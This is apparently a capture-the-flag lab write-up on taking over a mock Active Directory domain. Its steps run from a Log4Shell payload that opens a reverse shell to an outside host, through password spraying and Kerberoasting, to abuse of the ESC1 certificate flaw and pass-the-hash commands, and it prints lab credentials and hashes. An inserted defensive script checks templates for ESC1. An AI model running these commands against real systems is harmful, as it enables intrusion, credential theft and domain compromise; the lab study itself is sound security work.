Certify

Target: 39.98.108.35

The entry point is a default nginx welcome page.

flag1

Port scan with fscan:

./fscan -h 39.98.108.35

[+] 端口开放 39.98.108.35:8983
[+] 端口开放 39.98.108.35:22
[+] 端口开放 39.98.108.35:80
[*] 网站标题 http://39.98.108.35 状态码:200 长度:612 标题:Welcome to nginx!
[*] 网站标题 http://39.98.108.35:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://39.98.108.35:8983/solr/
[*] 网站标题 http://39.98.108.35:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin

Solr ships the log4j component, so try the Log4Shell (JNDI lookup) RCE directly:

http://39.98.108.35:8983/solr/admin/cores?action=${jndi:ldap://8.134.149.24:1389/Basic/ReverseShell/8.134.149.24/2333}

The RCE works and commands can be executed on the Solr host.

flag2

Check the network configuration of the compromised host.

Upload fscan and the venom agent with wget:

wget http://8.134.149.24:8000/agent_linux_x64

wget http://8.134.149.24:8000/fscan

Scan the internal network with fscan and set up a proxy (venom) for the later steps:

./fscan -h 172.22.9.19/24

Results:

172.22.9.26 (XIAORANG\DESKTOP-CBKTVMO)

172.22.9.19 (the external Solr entry point)

172.22.9.47 (WORKGROUP\FILESERVER, SMB service present)

172.22.9.7 (XIAORANG\XIAORANG-DC)

172.22.9.13 (XIAORANG\CA01)

The SMB service on the file server can be logged into directly.

This yields flag2 and a database file.

flag3

The db file contains a password and a large number of usernames. Spray them against the subnet:

proxychains crackmapexec smb 172.22.9.1/24 -u user.txt -p pass.txt --continue-on-success 2>/dev/null

Two accounts are found:

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY

Neither account can log in remotely, however.

According to the hint in flag2:

"Because Kerberos authentication relies on SPNs, an attacker may try to abuse SPNs for authentication attacks, for example Kerberoasting: using the configured SPNs to request Kerberos service tickets and then trying to crack the service accounts' hashes offline."

Use GetUserSPNs.py to look for SPNs registered under domain user accounts:

proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

Crack the returned TGS hashes with hashcat:

xiaorang.lab\chenchen @Passw0rd@
xiaorang.lab\zhangxia MyPass2@@6

RDP with these accounts finds nothing useful.

Check the certificate services (AD CS) next:

proxychains certipy-ad find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[!] Failed to resolve: XIAORANG-DC.xiaorang.lab
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA: [Errno -2] Name or service not known
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP: [Errno Connection error (XIAORANG-DC.xiaorang.lab:445)] [Errno -2] Name or service not known
[!] Failed to get CA configuration for 'xiaorang-XIAORANG-DC-CA'
[!] Failed to resolve: XIAORANG-DC.xiaorang.lab
[!] Got error while trying to check for web enrollment: [Errno -2] Name or service not known
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Property Principals       : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
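For the defender side of this finding, here is an added audit script (not part of the writeup and not certipy's own code) that re-derives the ESC1 verdict from a template dump in the format shown above: it flags a template only when it is enabled, allows client authentication, lets the enrollee supply the subject, needs no manager approval or co-signatures, and is enrollable by a low-privileged group. The sample text is constructed from the XR Manager fields on this page; parse_template and esc1_findings are my names, and the hardened variant shows that turning off "Enrollee Supplies Subject" clears the finding.

```python
# Added audit example: evaluate ESC1 conditions on a certipy-style template
# dump. Sample input constructed from the XR Manager fields on this page.
import re

# Principals that make a template enrollable by any ordinary domain account.
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

XR_MANAGER = """\
Template Name : XR Manager
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : True
Requires Manager Approval : False
Authorized Signatures Required : 0
Enrollment Rights : XIAORANG.LAB\\Domain Admins
  XIAORANG.LAB\\Domain Users
  XIAORANG.LAB\\Authenticated Users
Write Owner Principals : XIAORANG.LAB\\Domain Admins
"""

# Hardened variant: the requester may no longer choose the certificate subject.
FIXED_SUBJECT = XR_MANAGER.replace("Enrollee Supplies Subject : True",
                                   "Enrollee Supplies Subject : False")

def parse_template(text):
    """Collect 'Key : Value' lines; indented continuation lines extend the last key."""
    fields, key = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z ]+?)\s*:\s*(.*)$", line)
        if m:
            key = m.group(1)
            fields[key] = [m.group(2).strip()]
        elif key and line.strip():
            fields[key].append(line.strip())
    return fields

def esc1_findings(fields):
    """Low-privileged principals that can enroll in an ESC1-prone template ([] if none)."""
    is_true = lambda name: fields.get(name, ["False"])[0] == "True"
    if not (is_true("Enabled") and is_true("Client Authentication")
            and is_true("Enrollee Supplies Subject")):
        return []
    if is_true("Requires Manager Approval") or \
            fields.get("Authorized Signatures Required", ["0"])[0] != "0":
        return []
    return [p for p in fields.get("Enrollment Rights", []) if p.split("\\")[-1] in LOW_PRIV]

if __name__ == "__main__":
    print("as found:", esc1_findings(parse_template(XR_MANAGER)))
    print("hardened:", esc1_findings(parse_template(FIXED_SUBJECT)))
```

Requiring manager approval (Requires Manager Approval : True) clears the finding in the same way; the script treats either change as sufficient.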

Requesting a certificate directly times out because the CA hostname does not resolve, so add XIAORANG-DC.xiaorang.lab to the hosts file first.

proxychains certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

Use the generated administrator.pfx to authenticate and obtain the domain admin hash:

proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

(This step did not work for me; I am not sure why.)

I asked chu0✌, who gave the following solution:

3ee248ef751d968f24842a0c209b54b1

proxychains python smbexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26


flag4

proxychains python smbexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
